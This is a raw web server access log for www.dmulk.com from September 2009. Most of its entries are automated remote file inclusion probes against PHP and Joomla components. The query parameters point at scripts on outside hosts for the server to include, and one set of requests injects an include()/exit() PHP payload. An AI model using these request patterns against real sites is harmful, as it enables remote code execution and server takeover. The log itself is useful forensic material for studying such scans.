75.126.86.185 - - [07/Sep/2009:11:06:28 -0700] "GET /?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:28 -0700] "GET /logs/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:28 -0700] "GET /logs/access_090322.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:06:28 -0700] "GET /logs/access_090503.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:34 -0700] "GET /logs/access_090322.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:34 -0700] "GET /?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 19920 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:34 -0700] "GET /logs/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:06:38 -0700] "GET /logs/access_090509.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:06:38 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:06:38 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:06:42 -0700] "GET /logs/access_090714.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:43 -0700] "GET /logs/access_090503.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:06:47 -0700] "GET /logs/access_090714.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:06:53 -0700] "GET /logs/access_090503.log/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:07:27 -0700] "GET /logs/access_090322.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:07:39 -0700] "GET /logs/access_080412.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:07:52 -0700] "GET /logs/access_090322.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
188.40.50.203 - - [07/Sep/2009:11:07:53 -0700] "GET /logs/access_090503.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:07:59 -0700] "GET /logs/access_090322.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.37.136.126 - - [07/Sep/2009:11:08:01 -0700] "GET /logs/access_090503.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:08:07 -0700] "GET /logs/access_090503.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:08:08 -0700] "GET /logs/access_090322.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.126.86.185 - - [07/Sep/2009:11:08:14 -0700] "GET /logs/access_090503.log%20%20/?seccion=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:16 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:16 -0700] "GET /logs/access_090712.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:17 -0700] "GET /logs/access_090712.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.4 - - [07/Sep/2009:11:08:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:19 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:20 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:20 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:20 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:20 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:09:22 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:09:22 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:09:25 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:25 -0700] "GET /logs/access_090824.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:09:35 -0700] "GET /logs/access_090824.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:39 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:39 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:40 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:42 -0700] "GET /logs/access_090330.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:42 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:42 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:49 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:49 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:50 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 19839 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:51 -0700] "GET /logs/access_080510.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:51 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:09:51 -0700] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 19839 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:09:59 -0700] "GET /logs/access_090824.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:10:00 -0700] "GET /logs/access_080513.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:10:04 -0700] "GET /logs/access_090824.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:11:36 -0700] "GET /logs/access_081111.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:43 -0700] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:43 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:43 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:11:45 -0700] "GET /logs/access_081111.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:51 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:51 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:51 -0700] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:56 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:11:58 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.218 - - [07/Sep/2009:11:12:09 -0700] "GET /logs/access_080821.log HTTP/1.0" 200 3017907 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:12:09 -0700] "GET /logs/access_081011.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:12:19 -0700] "GET /logs/access_081011.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:12:31 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:12:31 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:12:31 -0700] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:11:12:41 -0700] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.71.48.169 - - [07/Sep/2009:11:12:45 -0700] "GET /logs/access_090427.log/index.php?pg=http://www.seqent.com/customercarecenter/languages/bo.lang?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.71.48.169 - - [07/Sep/2009:11:12:45 -0700] "GET /logs/index.php?pg=http://www.seqent.com/customercarecenter/languages/bo.lang?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.71.48.169 - - [07/Sep/2009:11:12:46 -0700] "GET /index.php?pg=http://www.seqent.com/customercarecenter/languages/bo.lang?%0D?? HTTP/1.1" 200 19793 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:29 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:29 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:29 -0700] "GET /logs/access_080601.log%20%20//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:29 -0700] "GET /logs/access_090306.log%20%20//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:13:34 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:35 -0700] "GET /logs/access_090306.log%20%20//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:35 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:35 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:13:35 -0700] "GET /logs/access_080601.log%20%20//akocomments.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:13:38 -0700] "GET /logs/access_080418.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:13:40 -0700] "GET /appserv/main.php?appserv_root=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:13:40 -0700] "GET /logs//appserv/main.php?appserv_root=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:13:43 -0700] "GET /logs/access_081107.log%20%20//appserv/main.php?appserv_root=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:13:52 -0700] "GET /logs/access_081111.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:01 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19907 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:01 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:14:04 -0700] "GET /logs/access_080515.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:14:04 -0700] "GET /logs/access_081111.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:05 -0700] "GET /logs/access_090223.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:06 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:06 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:08 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:09 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:12 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:13 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:20 -0700] "GET /logs/access_080703.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:26 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:28 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:28 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:32 -0700] "GET /logs/access_080412.log%20%20/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:14:32 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:11:14:48 -0700] "GET /blog/wp-content/gallery/2008-decstmaint/004.jpg HTTP/1.1" 200 376259 "-" "Googlebot-Image/1.0" "dmulk.com"
199.96.29.70 - - [07/Sep/2009:11:14:54 -0700] "GET /logs/access_080518.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
199.96.29.70 - - [07/Sep/2009:11:14:54 -0700] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
199.96.29.70 - - [07/Sep/2009:11:14:54 -0700] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:01 -0700] "GET /logs/access_090223.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:02 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:02 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:09 -0700] "GET /logs/access_080703.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
199.96.29.70 - - [07/Sep/2009:11:15:16 -0700] "GET /logs/access_090627.log//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:24 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.0" 200 19890 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:24 -0700] "GET /logs/access_090223.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:24 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:26 -0700] "GET /logs/access_090223.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:26 -0700] "GET /?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 19906 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:26 -0700] "GET /logs/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:29 -0700] "GET /logs/access_080703.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [07/Sep/2009:11:15:39 -0700] "GET /logs/access_080703.log/?sourcedir=http://messinia.onegreece.com/tmp/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
